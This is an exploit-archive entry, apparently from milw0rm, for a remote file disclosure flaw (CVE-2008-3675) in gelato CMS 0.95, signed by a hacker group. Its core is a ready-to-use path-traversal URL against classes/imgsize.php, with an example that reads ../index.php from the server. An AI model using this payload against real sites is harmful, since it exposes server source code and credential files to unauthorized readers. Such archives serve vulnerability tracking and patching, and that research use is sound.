gelato CMS 0.95 - 'img' Remote File Disclosure



EKU-ID: 14152 CVE: OSVDB-47456;CVE-2008-3675 OSVDB-ID:
Author: JIKO Published: 2008-08-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


=---------------------------------------------=
=                ,.:oO0^-^0Oo:.,              =
=                      JIKO                   =
=                '':0Oov-voO0:''              =
=---------------------------------------------=
----------------------=JIKO=-------------------
| Autor    :> jiko
| Home     :> WwW.No-Exploit.CoM
| Script   :> gelato CMS
| Bug      :> Remote File Disclosure Vulnerability
| Download :> http://www.gelatocms.com/
_______________________________________________
=                   JIKI TEAm                 =
_______________________________________________
| Exploit:
.:|http://localhost/[Script]/classes/imgsize.php?img=[file]
~EX
.:|http://localhost/[script]/classes/imgsize.php?img=../index.php
| Greetz :
.:| Stack & Gold_M & HaCkeR_EgY  All Member wwW.No-Exploit.CoM
----------------------=JIKO=-------------------
=---------------------------------------------=
=                   JIKI TEAm                 =
=---------------------------------------------=

# milw0rm.com [2008-08-13]